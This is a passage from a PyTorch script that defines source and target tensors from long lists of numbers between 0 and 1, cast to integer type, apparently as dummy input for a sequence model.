7,0.1,0.3,0.1,0.1,0.7,0.6,0.8,0.8,0.7,0.7,0.4,0.8,0.4,0.1,0.0,1.0,0.2,0.6,0.8,0.3,0.9,0.3,0.6,0.6,0.4,0.7,0.0,0.2,0.9,0.2,0.1,0.4,0.9,0.5,0.2,0.4,1.0,0.1,0.3,0.8,0.8,0.2,0.2,0.6,0.8,0.1,0.0,0.5,1.0,0.5,0.7,0.3,0.5,0.0,0.2,0.6,0.7,0.6,0.4,0.2,0.0,0.4,0.4,0.0,0.3,0.3,0.8,0.5,0.7,0.4,0.1,0.8,0.4,0.1,0.3,1.0,0.3,0.6,0.5,0.6,0.2,0.9,0.4,0.4,0.8,0.0,0.3,0.8,0.3,0.1,0.0,0.5,0.5,0.8,0.6,1.0,0.7,0.8,0.7,0.7,0.6,0.0,0.6,0.6,0.3,0.7,0.2,1.0,0.6,0.4,0.8,0.4,0.7,0.3,0.8,0.8,0.1,0.1,0.2,0.2,0.7,0.1,0.8,0.4,1.0,0.6,1.0,0.3,0.9,0.9,0.9,0.9,1
.0,0.2,0.3,0.9,0.5,0.5,0.4,0.1,0.4,0.0,0.7,0.2,0.6,0.8,0.2,0.8,0.2,0.6,0.9,0.1,0.3,0.4,0.2,0.9,0.3,0.9,0.1,0.1,0.7,1.0,0.4,0.2,0.9,0.2,0.5,0.1,0.3,0.6,0.5,0.6,0.5,0.3,0.4,0.3,0.9,0.7,0.1,0.2,0.8,1.0,0.5,0.0,0.8,0.2,0.2,0.0,1.0,0.2,1.0,0.5,1.0,0.9,0.5,0.2,0.5,0.8,0.4,0.9,0.9,0.2,0.5,0.5,0.2,0.6,0.3,0.3,0.8,0.3,0.5,0.4,0.2,0.7,0.8,0.9,0.2,0.9,0.6,0.0,0.3,0.8,0.5,0.3,0.9,0.9,0.7,0.4,0.9,0.3,0.7,0.4,0.3,0.5,0.8,0.9,0.7,0.6,0.5,0.1,0.9,0.6,0.5,0.2,0.7,0.3,0.3,0.1,0.0,0.2,0.5,0.9,0.7,0.3,0.3,1.0,0.3,0.6,0.9,0.1,0.9,0.3,0.7,0.1,0.7,0.6,0.6,0.5,0.1,0.1,0.3,0.5,0.7,0.1,0.7,0.4,0.8,0.4,0.6,0.8,0.7,0.6,0.0,0.1,0.3,0.8,0.2,0.5,0.7,0.0,0.4,1.0,0.2,0.2,0.4,0.3,0.9,0.2,0.4,0.3,0.4,0.2,0.5,0.6,0.6,0.8,0.7,0.3,0.1,0.7,0.5,0.1,0.4,1.0,0.2,0.8,0.5,0.7,0.3,0.7,0.6,0.7,0.5,1.0,0.2,0.8,0.0,0.1,0.2,0.6,0.0,0.2,0.1,0.2,0.4,0.6,0.2,1.0,0.3,0.1,0.1,0.7,0.0,0.7,0.0,0.7,0.9,0.1,0.2,0.8,0.7,0.5,0.3,0.8,0.3,0.0,0.1,0.1,0.8,0.9,0.2,0.5,0.5,0.4,0.4,0.8,0.9,0.4,1.0,0.8,0.4,0.2,0.1,0.3,0.1,0.7,0.9,0.2,0.9,0.8,0.7,0.2,0.7,0.4,0.0,1.0,0.7,0.3,0.6,0.9,0.1,0.5,0.2,0.5,0.7,0.3,0.9,0.7,0.2,1.0,0.6,0.4,0.3,0.1,0.1,0.0,0.3,0.9,0.7,0.5,0.9,0.8,0.6,0.8,0.1,0.4,0.5,0.8,0.7,0.4,0.8,0.4,0.1,0.6,0.8,0.0,0.9,0.7,0.7,0.7,0.7,0.3,0.4,0.4,0.2,0.6,0.3,0.4,1.0,0.2,0.3,0.0,0.5,1.0,0.8,0.7,0.3,0.2,0.7,0.1,0.5,0.2,0.3,0.4,0.8,0.4,0.2,0.3,0.9,0.5,0.1,0.7,0.0,0.3,0.3,0.1,0.1,0.8,0.2,0.6,0.2,0.0,0.3,0.6,0.4,0.7,0.6,0.2,0.8,0.4,0.3,0.7,0.3,0.7,0.9,0.4,0.8,0.9,0.4,0.5,0.4,0.6,0.7,0.5,0.6,0.6,0.4,0.4,0.8,0.3,0.9,0.8,0.9,0.6,0.1,0.9,1.0,1.0,0.8,0.8,0.2,0.1,0.1,0.4,0.9,0.9,0.9,0.6,0.4,0.8,0.6,0.6,0.4,0.6,0.6,0.8,1.0,0.2,0.3,0.4,0.9,0.3,0.7,0.9,0.6,1.0,0.5,0.3,0.5,0.9,0.1,0.9,0.6,0.4,0.9,0.9,0.7,0.9,0.0,0.3,0.7,0.2,0.1,0.2,0.6,0.1,0.6,0.3,0.5,0.1,0.5,0.7,0.1,0.9,0.4,0.1,0.4,1.0,0.1,0.7,0.5,0.6,0.1,0.4,1.0,0.3,0.8,0.3,0.9,0.8,0.9,0.4,0.2,0.2,0.7,0.0,0.8,0.7,0.3,0.2,0.2,0.3,0.9,0.8,0.2,0.3,0.4,0.2,0.9,0.4,0.6,0.2,0.5,0.6,0.0,0.3,0.2,0.9,0.7,0.5,0.7,0.8,0.8,0.2,0.7,0.7,0.5,0.1,0.0,0.3,0.6,0.4,1.0,1.0,0.1,0.2,0.4,0.5,0.0,0.2,0.6,0.8,0
.7,0.5,0.2,0.3,0.7,0.4,0.7,0.8,0.2,0.7,0.8,0.9,0.7,0.2,0.5,0.7,0.9,0.7,0.5,0.1,1.0,0.5,0.6,0.9,0.5,0.7,0.3,0.9,0.8],
[0.5,0.6,0.0,0.9,0.9,0.4,0.4,0.9,0.1,0.7,0.8,0.7,1.0,0.5,0.6,0.5,0.9,0.7,0.2,0.4,0.6,0.7,0.4,0.2,0.3,0.3,0.9,1.0,0.0,0.5,0.5,0.6,0.1,0.6,0.1,1.0,0.8,0.4,0.2,0.6,0.9,0.2,0.1,0.5,0.0,0.5,0.3,0.9,0.5,0.0,0.9,0.4,0.4,0.5,0.7,0.9,0.1,0.9,0.0,0.2,0.6,0.8,0.7,0.1,0.6,0.2,0.2,0.8,0.7,0.2,0.1,0.2,0.6,0.8,0.6,0.4,0.8,0.8,0.9,0.7,0.8,0.4,0.5,0.1,0.7,0.9,0.2,0.3,0.0,0.7,0.0,0.1,0.7,0.8,0.9,0.7,0.6,0.3,0.7,0.7,0.2,0.1,0.3,0.7,0.3,0.8,0.2,0.1,0.8,0.9,0.2,0.4,0.5,0.5,0.9,0.9,0.3,0.7,0.1,0.6,0.7,0.2,0.6,0.9,0.8,0.7,0.0,0.4,0.1,0.6,0.5,0.1,0.8,0.7,0.9,0.7,0.5,0.7,0.8,0.8,0.2,0.5,0.3,0.4,0.8,0.4,0.1,0.3,0.4,0.3,0.4,0.7,0.4,0.7,0.9,0.2,0.8,0.3,0.8,0.3,0.8,0.7,0.3,0.4,0.4,0.6,0.1,0.3,0.6,0.5,0.9,0.7,0.3,0.6,0.5,0.3,0.4,0.2,0.8,0.3,0.1,0.9,0.9,0.6,0.1,0.4,0.2,0.4,0.8,0.9,0.1,0.4,0.8,0.5,0.4,0.8,0.9,1.0,0.1,0.8,0.8,0.8,0.8,0.8,0.3,0.1,1.0,0.2,0.9,0.2,0.9,0.7,0.9,1.0,0.4,0.2,0.5,0.4,0.3,0.2,0.1,0.1,0.8,0.7,0.0,0.3,1.0,1.0,0.0,0.5,0.0,0.5,0.6,0.8,0.2,0.4,0.0,0.8,0.5,0.8,0.6,0.3,0.4,0.7,0.9,0.0,0.8,0.7,0.9,0.9,0.2,0.3,0.3,0.9,0.3,0.3,0.3,0.6,0.8,0.5,0.5,0.0,0.5,0.8,1.0,0.4,1.0,0.3,0.5,0.5,0.6,0.6,0.7,0.1,0.3,0.6,0.4,0.2,0.8,1.0,0.6,0.9,0.7,0.5,0.1,0.7,0.6,1.0,0.4,0.9,0.3,0.6,0.1,1.0,0.8,0.7,0.7,0.5,0.0,0.6,0.5,1.0,0.6,0.9,0.8,0.9,0.7,1.0,0.9,1.0,0.3,0.2,0.5,0.3,0.8,0.1,0.9,0.6,0.9,0.9,0.3,0.4,0.1,0.6,0.0,0.0,0.2,0.2,0.9,0.9,0.6,1.0,0.2,0.7,1.0,0.8,1.0,0.2,0.3,0.3,0.9,0.5,0.1,0.2,0.5,0.9,0.1,0.5,0.2,1.0,0.7,0.4,0.2,0.1,0.4,0.4,0.7,0.8,0.3,0.6,0.0,1.0,0.8,1.0,0.1,0.2,0.9,0.4,0.8,0.0,0.0,1.0,0.1,0.3,0.0,0.7,0.6,0.9,0.4,0.4,0.9,0.4,0.8,0.7,0.7,0.5,0.3,0.6,0.5,0.5,0.5,0.9,0.8,0.4,0.8,0.6,0.4,0.2,0.9,1.0,0.8,0.2,0.2,0.8,0.9,0.7,0.1,0.8,0.7,0.3,0.1,0.2,0.3,0.6,0.6,0.6,0.7,0.4,0.1,0.9,0.5,0.5,0.5,0.4,0.6,0.2,0.7,0.6,0.3,0.3,0.2,0.4,0.2,0.9,0.9,0.9,0.7,0.8,0.3,0.0,0.4,0.1,0.9,0.6,0.3,0.0,0.7,0.1,0.8,0.6,0.3,0.6,0.8,0.2,0.1,0.4,0.8,0.9,1.0,0.7,0.8,0.1,0.4,0.1,0.4,0.9,0.4,0.6,0.7,0.2,0.5,0.6,0.8,0.6,0.6,0.9,0.7,0.4,0.3,0.5,0.1,0.8,0.9,0.4,0.0,0.4,0.0,0.3,0.6,0.8,0.1,0.4,0.1,0.6,0.7,0.1,0.0,0.0,0.0,0.8
,0.7,0.6,0.8,0.6,0.9,0.1,0.4,0.0,0.4,0.0,0.4,0.7,0.5,0.1,0.9,0.3,0.3,0.1,0.3,0.6,0.6,0.8,0.8,0.9,0.2,0.0,0.6,0.3,1.0,0.6,0.7,1.0,1.0,0.9,0.4,0.1,0.6,0.9,0.1,0.1,0.1,0.2,0.5,0.0,0.8,0.5,0.0,0.8,0.4,0.1,0.2,0.2,0.8,0.9,0.6,0.3,0.2,0.5,0.0,0.1,0.1,0.8,0.9,1.0,0.8,0.2,0.8,0.3,0.8,0.2,0.0,0.1,1.0,0.7,0.1,0.8,0.2,0.5,0.3,0.6,0.1,0.7,0.7,0.5,0.2,0.3,0.5,0.5,1.0,0.2,0.3,0.4,0.1,0.1,0.7,1.0,0.7,0.6,0.9,1.0,0.4,0.8,0.1,0.4,0.1,0.9,0.7,0.4,0.0,0.0,0.3,0.3,0.5,0.6,0.3,0.8,0.5,0.3,0.1,0.9,0.5,0.1,0.3,0.9,0.4,0.3,0.4,0.2,0.9,0.5,0.4,0.9,0.8,0.9,0.9,0.9,0.6,0.6,0.3,0.4,0.3,0.3,0.4,0.4,0.2,0.3,0.7,0.1,0.4,0.1,0.7,0.2,0.7,0.7,0.1,0.3,1.0,0.4,0.4,0.0,0.1,0.4,0.6,0.9,0.5,0.1,0.6,0.9,0.1,0.2,0.4,0.5,0.5,0.1,0.7,0.0,0.1,1.0,0.6,0.1,0.5,0.7,0.2,0.7,0.1,0.1,0.5,0.5,0.2,0.7,0.0,0.9,0.3,0.2,0.9,0.2,0.2,0.5,0.5,0.6,0.3,0.4,0.9,0.4,0.5,0.8,0.1,0.4,0.5,0.9,0.5,0.4,0.3,1.0,0.7,0.5,0.1,0.0,0.3,0.0,0.5,0.5,0.9,0.6,0.3,0.7,0.1,0.9,0.1,0.9,0.1,0.8,0.0,0.9,0.0,0.0,0.7,0.6,1.0,0.5,0.9,0.7,0.4,0.5,0.6,0.3,0.6,0.9,0.4,0.3,0.3,1.0,0.2,1.0,0.3,0.7,0.9,0.8,0.8,0.7,0.6,0.6,0.8,0.5,0.3,0.4,0.5,0.1,0.3,0.4,0.0,0.2,0.8,0.3,1.0,0.5,0.0,0.7,0.9,0.3,0.3,0.9,0.9,0.5,0.0,0.0,0.6,0.7,0.6,0.5,0.1,0.8,0.3,0.3,0.1,0.7,0.0,0.6,0.0,0.1,0.9,0.1,0.4,0.1,0.5,1.0,0.3,0.2,0.8,0.6,0.3,0.5,0.3,0.1,0.9,0.1,0.9,0.9,0.1,0.8,0.7,0.8,0.3,0.5,1.0,0.1,0.7,0.4,0.7,0.7,0.9,0.9,1.0,0.3,0.8,0.3,0.3,0.5,0.2,0.6,0.4,0.5,0.7,0.8,0.9,0.8,0.9,0.2,0.0,0.5,0.2,1.0,0.7,0.4,0.1,0.6,0.6,0.0,0.4,0.6,0.6,0.4,0.1,0.7,1.0,0.1,0.4,0.3,0.9,0.1,0.0,0.1,0.6,0.1,1.0,0.1,0.3,0.3,0.4,0.3,0.8,0.2,0.5,0.1,0.3,0.8,0.7,0.0,0.4,0.5,0.2,0.0,0.5,0.8,0.2,0.6,0.9,0.8,0.9,0.5,0.7,0.5,0.9,0.9,0.3,0.5,0.3,1.0,0.8,0.7,0.9,0.6,0.6,0.5,0.8,0.2,0.7,0.6,0.3,0.1,0.9,0.2,0.4,0.9,0.3,0.2,0.5,0.5,0.9,0.2,1.0,0.9,0.8,0.2,0.2,1.0,0.4,0.4,0.6,0.8,0.3,0.2,0.6,0.0,0.5,0.9,0.6,0.3,0.4,0.8,0.5,0.6,0.7,0.6,0.0,0.1,0.3,0.7,0.4,0.1,0.2,0.7,0.2,0.3,0.8,0.2,0.4,0.2,1.0,1.0,0.7,0.8,0.2,0.5,0.3,0.5,0.4,0.6,0.5,0.3,0.6,0.5,1.0,0.7,0.8,0.9,0.0,0.6,0.3,0.9,0.3,0.9,0.5,0.7,0.5,0.1,0.1,0.3,0.7,0.8
,0.1,0.0,0.7,0.5,1.0,0.3,0.8,0.7,0.7,0.2,0.9,0.5,0.6,0.1,0.5,0.5,0.0,0.2,0.7,0.9,0.1,0.9,0.3,0.2]]).to(
device, dtype=torch.int64
)
trg = torch.tensor([[0.5,0.6,0.0,0.9,0.9,0.4,0.4,0.9,0.1,0.7,0.8,0.7,1.0,0.5,0.6,0.5,0.9,0.7,0.2,0.4,0.6,0.7,0.4,0.2,0.3,0.3,0.9,1.0,0.0,0.5,0.5,0.6,0.1,0.6,0.1,1.0,0.8,0.4,0.2,0.6,0.9,0.2,0.1,0.5,0.0,0.5,0.3,0.9,0.5,0.0,0.9,0.4,0.4,0.5,0.7,0.9,0.1,0.9,0.0,0.2,0.6,0.8,0.7,0.1,0.6,0.2,0.2,0.8,0.7,0.2,0.1,0.2,0.6,0.8,0.6,0.4,0.8,0.8,0.9,0.7,0.8,0.4,0.5,0.1,0.7,0.9,0.2,0.3,0.0,0.7,0.0,0.1,0.7,0.8,0.9,0.7,0.6,0.3,0.7,0.7,0.2,0.1,0.3,0.7,0.3,0.8,0.2,0.1,0.8,0.9,0.2,0.4,0.5,0.5,0.9,0.9,0.3,0.7,0.1,0.6,0.7,0.2,0.6,0.9,0.8,0.7,0.0,0.4,0.1,0.6,0.5,0.1,0.8,0.7,0.9,0.7,0.5,0.7,0.8,0.8,0.2,0.5,0.3,0.4,0.8,0.4,0.1,0.3,0.4,0.3,0.4,0.7,0.4,0.7,0.9,0.2,0.8,0.3,0.8,0.3,0.8,0.7,0.3,0.4,0.4,0.6,0.1,0.3,0.6,0.5,0.9,0.7,0.3,0.6,0.5,0.3,0.4,0.2,0.8,0.3,0.1,0.9,0.9,0.6,0.1,0.4,0.2,0.4,0.8,0.9,0.1,0.4,0.8,0.5,0.4,0.8,0.9,1.0,0.1,0.8,0.8,0.8,0.8,0.8,0.3,0.1,1.0,0.2,0.9,0.2,0.9,0.7,0.9,1.0,0.4,0.2,0.5,0.4,0.3,0.2,0.1,0.1,0.8,0.7,0.0,0.3,1.0,1.0,0.0,0.5,0.0,0.5,0.6,0.8,0.2,0.4,0.0,0.8,0.5,0.8,0.6,0.3,0.4,0.7,0.9,0.0,0.8,0.7,0.9,0.9,0.2,0.3,0.3,0.9,0.3,0.3,0.3,0.6,0.8,0.5,0.5,0.0,0.5,0.8,1.0,0.4,1.0,0.3,0.5,0.5,0.6,0.6,0.7,0.1,0.3,0.6,0.4,0.2,0.8,1.0,0.6,0.9,0.7,0.5,0.1,0.7,0.6,1.0,0.4,0.9,0.3,0.6,0.1,1.0,0.8,0.7,0.7,0.5,0.0,0.6,0.5,1.0,0.6,0.9,0.8,0.9,0.7,1.0,0.9,1.0,0.3,0.2,0.5,0.3,0.8,0.1,0.9,0.6,0.9,0.9,0.3,0.4,0.1,0.6,0.0,0.0,0.2,0.2,0.9,0.9,0.6,1.0,0.2,0.7,1.0,0.8,1.0,0.2,0.3,0.3,0.9,0.5,0.1,0.2,0.5,0.9,0.1,0.5,0.2,1.0,0.7,0.4,0.2,0.1,0.4,0.4,0.7,0.8,0.3,0.6,0.0,1.0,0.8,1.0,0.1,0.2,0.9,0.4,0.8,0.0,0.0,1.0,0.1,0.3,0.0,0.7,0.6,0.9,0.4,0.4,0.9,0.4,0.8,0.7,0.7,0.5,0.3,0.6,0.5,0.5,0.5,0.9,0.8,0.4,0.8,0.6,0.4,0.2,0.9,1.0,0.8,0.2,0.2,0.8,0.9,0.7,0.1,0.8,0.7,0.3,0.1,0.2,0.3,0.6,0.6,0.6,0.7,0.4,0.1,0.9,0.5,0.5,0.5,0.4,0.6,0.2,0.7,0.6,0.3,0.3,0.2,0.4,0.2,0.9,0.9,0.9,0.7,0.8,0.3,0.0,0.4,0.1,0.9,0.6,0.3,0.0,0.7,0.1,0.8,0.6,0.3,0.6,0.8,0.2,0.1,0.4,0.8,0.9,1.0,0.7,0.8,0.1,0.4,0.1,0.4,0.9,0.4,0.6,0.7,0.2,0.5,0.6,0.8,0.6,0.6,0.9,0.7,0.4,0.3,0.5,0.1,0.8,0.9,0.4,0.0,0.4,0.0,0.3,0.6,0.8,0.1,0.4,0.1,0.6,0.7
,0.1,0.0,0.0,0.0,0.8,0.7,0.6,0.8,0.6,0.9,0.1,0.4,0.0,0.4,0.0,0.4,0.7,0.5,0.1,0.9,0.3,0.3,0.1,0.3,0.6,0.6,0.8,0.8,0.9,0.2,0.0,0.6,0.3,1.0,0.6,0.7,1.0,1.0,0.9,0.4,0.1,0.6,0.9,0.1,0.1,0.1,0.2,0.5,0.0,0.8,0.5,0.0,0.8,0.4,0.1,0.2,0.2,0.8,0.9,0.6,0.3,0.2,0.5,0.0,0.1,0.1,0.8,0.9,1.0,0.8,0.2,0.8,0.3,0.8,0.2,0.0,0.1,1.0,0.7,0.1,0.8,0.2,0.5,0.3,0.6,0.1,0.7,0.7,0.5,0.2,0.3,0.5,0.5,1.0,0.2,0.3,0.4,0.1,0.1,0.7,1.0,0.7,0.6,0.9,1.0,0.4,0.8,0.1,0.4,0.1,0.9,0.7,0.4,0.0,0.0,0.3,0.3,0.5,0.6,0.3,0.8,0.5,0.3,0.1,0.9,0.5,0.1,0.3,0.9,0.4,0.3,0.4,0.2,0.9,0.5,0.4,0.9,0.8,0.9,0.9,0.9,0.6,0.6,0.3,0.4,0.3,0.3,0.4,0.4,0.2,0.3,0.7,0.1,0.4,0.1,0.7,0.2,0.7,0.7,0.1,0.3,1.0,0.4,0.4,0.0,0.1,0.4,0.6,0.9,0.5,0.1,0.6,0.9,0.1,0.2,0.4,0.5,0.5,0.1,0.7,0.0,0.1,1.0,0.6,0.1,0.5,0.7,0.2,0.7,0.1,0.1,0.5,0.5,0.2,0.7,0.0,0.9,0.3,0.2,0.9,0.2,0.2,0.5,0.5,0.6,0.3,0.4,0.9,0.4,0.5,0.8,0.1,0.4,0.5,0.9,0.5,0.4,0.3,1.0,0.7,0.5,0.1,0.0,0.3,0.0,0.5,0.5,0.9,0.6,0.3,0.7,0.1,0.9,0.1,0.9,0.1,0.8,0.0,0.9,0.0,0.0,0.7,0.6,1.0,0.5,0.9,0.7,0.4,0.5,0.6,0.3,0.6,0.9,0.4,0.3,0.3,1.0,0.2,1.0,0.3,0.7,0.9,0.8,0.8,0.7,0.6,0.6,0.8,0.5,0.3,0.4,0.5,0.1,0.3,0.4,0.0,0.2,0.8,0.3,1.0,0.5,0.0,0.7,0.9,0.3,0.3,0.9,0.9,0.5,0.0,0.0,0.6,0.7,0.6,0.5,0.1,0.8,0.3,0.3,0.1,0.7,0.0,0.6,0.0,0.1,0.9,0.1,0.4,0.1,0.5,1.0,0.3,0.2,0.8,0.6,0.3,0.5,0.3,0.1,0.9,0.1,0.9,0.9,0.1,0.8,0.7,0.8,0.3,0.5,1.0,0.1,0.7,0.4,0.7,0.7,0.9,0.9,1.0,0.3,0.8,0.3,0.3,0.5,0.2,0.6,0.4,0.5,0.7,0.8,0.9,0.8,0.9,0.2,0.0,0.5,0.2,1.0,0.7,0.4,0.1,0.6,0.6,0.0,0.4,0.6,0.6,0.4,0.1,0.7,1.0,0.1,0.4,0.3,0.9,0.1,0.0,0.1,0.6,0.1,1.0,0.1,0.3,0.3,0.4,0.3,0.8,0.2,0.5,0.1,0.3,0.8,0.7,0.0,0.4,0.5,0.2,0.0,0.5,0.8,0.2,0.6,0.9,0.8,0.9,0.5,0.7,0.5,0.9,0.9,0.3,0.5,0.3,1.0,0.8,0.7,0.9,0.6,0.6,0.5,0.8,0.2,0.7,0.6,0.3,0.1,0.9,0.2,0.4,0.9,0.3,0.2,0.5,0.5,0.9,0.2,1.0,0.9,0.8,0.2,0.2,1.0,0.4,0.4,0.6,0.8,0.3,0.2,0.6,0.0,0.5,0.9,0.6,0.3,0.4,0.8,0.5,0.6,0.7,0.6,0.0,0.1,0.3,0.7,0.4,0.1,0.2,0.7,0.2,0.3,0.8,0.2,0.4,0.2,1.0,1.0,0.7,0.8,0.2,0.5,0.3,0.5,0.4,0.6,0.5,0.3,0.6,0.5,1.0,0.7,0.8,0.9,0.0,0.6,0.3,0.9,0.3,0.9,0.5,0.7,0.5
,0.1,0.1,0.3,0.7,0.8,0.1,0.0,0.7,0.5,1.0,0.3,0.8,0.7,0.7,0.2,0.9,0.5,0.6,0.1,0.5,0.5,0.0,0.2,0.7,0.9,0.1,0.9,0.3,0.2],
[0.5,0.6,0.0,0.9,0.9,0.4,0.4,0.9,0.1,0.7,0.8,0.7,1.0,0.5,0.6,0.5,0.9,0.7,0.2,0.4,0.6,0.7,0.4,0.2,0.3,0.3,0.9,1.0,0.0,0.5,0.5,0.6,0.1,0.6,0.1,1.0,0.8,0.4,0.2,0.6,0.9,0.2,0.1,0.5,0.0,0.5,0.3,0.9,0.5,0.0,0.9,0.4,0.4,0.5,0.7,0.9,0.1,0.9,0.0,0.2,0.6,0.8,0.7,0.1,0.6,0.2,0.2,0.8,0.7,0.2,0.1,0.2,0.6,0.8,0.6,0.4,0.8,0.8,0.9,0.7,0.8,0.4,0.5,0.1,0.7,0.9,0.2,0.3,0.0,0.7,0.0,0.1,0.7,0.8,0.9,0.7,0.6,0.3,0.7,0.7,0.2,0.1,0.3,0.7,0.3,0.8,0.2,0.1,0.8,0.9,0.2,0.4,0.5,0.5,0.9,0.9,0.3,0.7,0.1,0.6,0.7,0.2,0.6,0.9,0.8,0.7,0.0,0.4,0.1,0.6,0.5,0.1,0.8,0.7,0.9,0.7,0.5,0.7,0.8,0.8,0.2,0.5,0.3,0.4,0.8,0.4,0.1,0.3,0.4,0.3,0.4,0.7,0.4,0.7,0.9,0.2,0.8,0.3,0.8,0.3,0.8,0.7,0.3,0.4,0.4,0.6,0.1,0.3,0.6,0.5,0.9,0.7,0.3,0.6,0.5,0.3,0.4,0.2,0.8,0.3,0.1,0.9,0.9,0.6,0.1,0.4,0.2,0.4,0.8,0.9,0.1,0.4,0.8,0.5,0.4,0.8,0.9,1.0,0.1,0.8,0.8,0.8,0.8,0.8,0.3,0.1,1.0,0.2,0.9,0.2,0.9,0.7,0.9,1.0,0.4,0.2,0.5,0.4,0.3,0.2,0.1,0.1,0.8,0.7,0.0,0.3,1.0,1.0,0.0,0.5,0.0,0.5,0.6,0.8,0.2,0.4,0.0,0.8,0.5,0.8,0.6,0.3,0.4,0.7,0.9,0.0,0.8,0.7,0.9,0.9,0.2,0.3,0.3,0.9,0.3,0.3,0.3,0.6,0.8,0.5,0.5,0.0,0.5,0.8,1.0,0.4,1.0,0.3,0.5,0.5,0.6,0.6,0.7,0.1,0.3,0.6,0.4,0.2,0.8,1.0,0.6,0.9,0.7,0.5,0.1,0.7,0.6,1.0,0.4,0.9,0.3,0.6,0.1,1.0,0.8,0.7,0.7,0.5,0.0,0.6,0.5,1.0,0.6,0.9,0.8,0.9,0.7,1.0,0.9,1.0,0.3,0.2,0.5,0.3,0.8,0.1,0.9,0.6,0.9,0.9,0.3,0.4,0.1,0.6,0.0,0.0,0.2,0.2,0.9,0.9,0.6,1.0,0.2,0.7,1.0,0.8,1.0,0.2,0.3,0.3,0.9,0.5,0.1,0.2,0.5,0.9,0.1,0.5,0.2,1.0,0.7,0.4,0.2,0.1,0.4,0.4,0.7,0.8,0.3,0.6,0.0,1.0,0.8,1.0,0.1,0.2,0.9,0.4,0.8,0.0,0.0,1.0,0.1,0.3,0.0,0.7,0.6,0.9,0.4,0.4,0.9,0.4,0.8,0.7,0.7,0.5,0.3,0.6,0.5,0.5,0.5,0.9,0.8,0.4,0.8,0.6,0.4,0.2,0.9,1.0,0.8,0.2,0.2,0.8,0.9,0.7,0.1,0.8,0.7,0.3,0.1,0.2,0.3,0.6,0.6,0.6,0.7,0.4,0.1,0.9,0.5,0.5,0.5,0.4,0.6,0.2,0.7,0.6,0.3,0.3,0.2,0.4,0.2,0.9,0.9,0.9,0.7,0.8,0.3,0.0,0.4,0.1,0.9,0.6,0.3,0.0,0.7,0.1,0.8,0.6,0.3,0.6,0.8,0.2,0.1,0.4,0.8,0.9,1.0,0.7,0.8,0.1,0.4,0.1,0.4,0.9,0.4,0.6,0.7,0.2,0.5,0.6,0.8,0.6,0.6,0.9,0.7,0.4,0.3,0.5,0.1,0.8,0.9,0.4,0.0,0.4,0.0,0.3,0.6,0.8,0.1,0.4,0.1,0.6,0.7,0.1,0.0,0.0,0.0,0.8
,0.7,0.6,0.8,0.6,0.9,0.1,0.4,0.0,0.4,0.0,0.4,0.7,0.5,0.1,0.9,0.3,0.3,0.1,0.3,0.6,0.6,0.8,0.8,0.9,0.2,0.0,0.6,0.3,1.0,0.6,0.7,1.0,1.0,0.9,0.4,0.1,0.6,0.9,0.1,0.1,0.1,0.2,0.5,0.0,0.8,0.5,0.0,0.8,0.4,0.1,0.2,0.2,0.8,0.9,0.6,0.3,0.2,0.5,0.0,0.1,0.1,0.8,0.9,1.0,0.8,0.2,0.8,0.3,0.8,0.2,0.0,0.1,1.0,0.7,0.1,0.8,0.2,0.5,0.3,0.6,0.1,0.7,0.7,0.5,0.2,0.3,0.5,0.5,1.0,0.2,0.3,0.4,0.1,0.1,0.7,1.0,0.7,0.6,0.9,1.0,0.4,0.8,0.1,0.4,0.1,0.9,0.7,0.4,0.0,0.0,0.3,0.3,0.5,0.6,0.3,0.8,0.5,0.3,0.1,0.9,0.5,0.1,0.3,0.9,0.4,0.3,0.4,0.2,0.9,0.5,0.4,0.9,0.8,0.9,0.9,0.9,0.6,0.6,0.3,0.4,0.3,0.3,0.4,0.4,0.2,0.3,0.7,0.1,0.4,0.1,0.7,0.2,0.7,0.7,0.1,0.3,1.0,0.4,0.4,0.0,0.1,0.4,0.6,0.9,0.5,0.1,0.6,0.9,0.1,0.2,0.4,0.5,0.5,0.1,0.7,0.0,0.1,1.0,0.6,0.1,0.5,0.7,0.2,0.7,0.1,0.1,0.5,0.5,0.2,0.7,0.0,0.9,0.3,0.2,0.9,0.2,0.2,0.5,0.5,0.6,0.3,0.4,0.9,0.4,0.5,0.8,0.1,0.4,0.5,0.9,0.5,0.4,0.3,1.0,0.7,0.5,0.1,0.0,0.3,0.0,0.5,0.5,0.9,0.6,0.3,0.7,0.1,0.9,0.1,0.9,0.1,0.8,0.0,0.9,0.0,0.0,0.7,0.6,1.0,0.5,0.9,0.7,0.4,0.5,0.6,0.3,0.6,0.9,0.4,0.3,0.3,1.0,0.2,1.0,0.3,0.7,0.9,0.8,0.8,0.7,0.6,0.6,0.8,0.5,0.3,0.4,0.5,0.1,0.3,0.4,0.0,0.2,0.8,0.3,1.0,0.5,0.0,0.7,0.9,0.3,0.3,0.9,0.9,0.5,0.0,0.0,0.6,0.7,0.6,0.5,0.1,0.8,0.3,0.3,0.1,0.7,0.0,0.6,0.0,0.1,0.9,0.1,0.4,0.1,0.5,1.0,0.3,0.2,0.8,0.6,0.3,0.5,0.3,0.1,0.9,0.1,0.9,0.9,0.1,0.8,0.7,0.8,0.3,0.5,1.0,0.1,0.7,0.4,0.7,0.7,0.9,0.9,1.0,0.3,0.8,0.3,0.3,0.5,0.2,0.6,0.4,0.5,0.7,0.8,0.9,0.8,0.9,0.2,0.0,0.5,0.2,1.0,0.7,0.4,0.1,0.6,0.6,0.0,0.4,0.6,0.6,0.4,0.1,0.7,1.0,0.1,0.4,0.3,0.9,0.1,0.0,0.1,0.6,0.1,1.0,0.1,0.3,0.3,0.4,0.3,0.8,0.2,0.5,0.1,0.3,0.8,0.7,0.0,0.4,0.5,0.2,0.0,0.5,0.8,0.2,0.6,0.9,0.8,0.9,0.5,0.7,0.5,0.9,0.9,0.3,0.5,0.3,1.0,0.8,0.7,0.9,0.6,0.6,0.5,0.8,0.2,0.7,0.6,0.3,0.1,0.9,0.2,0.4,0.9,0.3,0.2,0.5,0.5,0.9,0.2,1.0,0.9,0.8,0.2,0.2,1.0,0.4,0.4,0.6,0.8,0.3,0.2,0.6,0.0,0.5,0.9,0.6,0.3,0.4,0.8,0.5,0.6,0.7,0.6,0.0,0.1,0.3,0.7,0.4,0.1,0.2,0.7,0.2,0.3,0.8,0.2,0.4,0.2,1.0,1.0,0.7,0.8,0.2,0.5,0.3,0.5,0.4,0.6,0.5,0.3,0.6,0.5,1.0,0.7,0.8,0.9,0.0,0.6,0.3,0.9,0.3,0.9,0.5,0.7,0.5,0.1,0.1,0.3,0.7,0.8
,0.1,0.0,0.7,0.5,1.0,0.3,0.8,0.7,0.7,0.2,0.9,0.5,0.6,0.1,0.5,0.5,0.0,0.2,0.7,0.9,0.1,0.9,0.3,0.2]]).to(device, dtype=torch.int64)
